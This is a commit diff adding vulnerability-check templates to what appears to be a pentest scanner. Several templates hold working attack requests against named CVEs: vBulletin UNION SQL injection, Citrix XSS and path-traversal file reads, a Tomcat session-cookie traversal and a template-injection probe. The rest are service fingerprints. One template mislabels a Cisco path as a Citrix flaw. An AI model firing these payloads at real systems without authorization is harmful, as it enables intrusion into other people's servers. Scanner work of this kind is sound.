* v8.6 - Added CVE-2020-12720 - vBulletin Unauthenticaed SQLi

* v8.6 - Added CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection
* v8.6 - Added CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server
* v8.6 - Added CVE-2020-3187 - Citrix Unauthenticated File Deletion
* v8.6 - Added CVE-2020-8193 - Citrix Unauthenticated LFI
* v8.6 - Added CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection
* v8.6 - Added CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
* v8.6 - Added CVE-2020-9484 - Apache Tomcat RCE by deserialization
* v8.6 - Added Cisco VPN scanner template
* v8.6 - Added Tiki Wiki CMS scanner template
* v8.6 - Added Palo Alto PAN OS Portal scanner template
* v8.6 - Added SAP NetWeaver AS JAVA LM Configuration Wizard Detection
* v8.6 - Added delete task workspace function to remove running tasks

CHANGELOG.md

@@ -1,4 +1,17 @@
 ## CHANGELOG:
+* v8.6 - Added CVE-2020-12720 - vBulletin Unauthenticaed SQLi
+* v8.6 - Added CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection
+* v8.6 - Added CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server
+* v8.6 - Added CVE-2020-3187 - Citrix Unauthenticated File Deletion
+* v8.6 - Added CVE-2020-8193 - Citrix Unauthenticated LFI
+* v8.6 - Added CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection
+* v8.6 - Added CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
+* v8.6 - Added CVE-2020-9484 - Apache Tomcat RCE by deserialization
+* v8.6 - Added Cisco VPN scanner template
+* v8.6 - Added Tiki Wiki CMS scanner template
+* v8.6 - Added Palo Alto PAN OS Portal scanner template
+* v8.6 - Added SAP NetWeaver AS JAVA LM Configuration Wizard Detection
+* v8.6 - Added delete task workspace function to remove running tasks
 * v8.6 - Added CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability Sc0pe template
 * v8.6 - Updated theharvester command to exclude github-code search
 * v8.6 - Updated theharvester installer to v3.1

templates/active/CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server'
+URI="/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
+METHOD='GET'
+MATCH="List\ does\ not\ exist|It\ may\ have\ been\ deleted\ by\ another\ user"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s --insecure -I "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1'
+URI="/ajax/api/content_infraction/getIndexableContent"
+METHOD='POST'
+MATCH="6162636D31|database\ error"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2'
+URI="/vb5/ajax/api/content_infraction/getIndexableContent"
+METHOD='POST'
+MATCH="6162636D31|database\ error"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3'
+URI="/vb5/ajax/api/content_infraction/getIndexableContent"
+METHOD='POST'
+MATCH="vbulletinrce"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion'
+URI="/+CSCOE+/session_password.html"
+METHOD='GET'
+MATCH="webvpn"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s --insecure -I "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS'
+URI="/menu/stapp"
+METHOD='POST'
+MATCH="<\/title><script>alert\(31337\)</script>"
+SEVERITY='P1 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot'"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI'
+URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
+METHOD='POST'
+MATCH="SESSID"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data '<appfwprofile><login></login></appfwprofile>'"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection'
+URI="/menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo"
+METHOD='GET'
+MATCH="<jnlp codebase=\"nonexistent.1337\">"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read'
+URI="/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
+METHOD='GET'
+MATCH="bit\ app\ support|fonts|extensions"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s --insecure "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization'
+URI="/index.jsp"
+METHOD='GET'
+MATCH="Exception|ObjectInputStream|PersistentManagerBase"
+SEVERITY='P1 - CRITICAL'
+CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection'
+URI="/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
+METHOD='GET'
+MATCH="22344"
+SEVERITY='P2 - HIGH'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/Cisco_VPN_Login_Scanner.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Cisco VPN Login Detected'
+URI='/+CSCOE+/logon.html'
+METHOD='GET'
+MATCH="CSCO_Format"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/Cisco_VPN_Scanner.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Cisco VPN Detected'
+URI='/+CSCOE+/win.js'
+METHOD='GET'
+MATCH="CSCO_WebVPN"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/Citrix_VPN_Scanner_2.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Citrix VPN Detected 2'
+URI='/vpn/index.html'
+METHOD='GET'
+MATCH="NetScaler "
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Palo Alto GlobalProtect PAN-OS Portal Detected'
+URI='/global-protect/login.esp'
+METHOD='GET'
+MATCH="<title>GlobalProtect"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='CVE-2020-6287 - SAP NetWeaver AS JAVA LM Configuration Wizard Detection'
+URI='/CTCWebService/CTCWebServiceBean/ConfigServlet'
+METHOD='GET'
+MATCH="CTCWebServiceSi"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: text/xml; charset=UTF-8' "
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'

templates/active/Tiki_Wiki_CMS_Groupware_Scanner.sh

@@ -0,0 +1,9 @@
+AUTHOR='@xer0dayz'
+VULN_NAME='Tiki Wiki CMS Groupware'
+URI='/tiki-login.php'
+METHOD='GET'
+MATCH="Groupware"
+SEVERITY='P5 - INFO'
+CURL_OPTS="--user-agent '' -s -L --insecure"
+SECONDARY_COMMANDS=''
+GREP_OPTIONS='-i'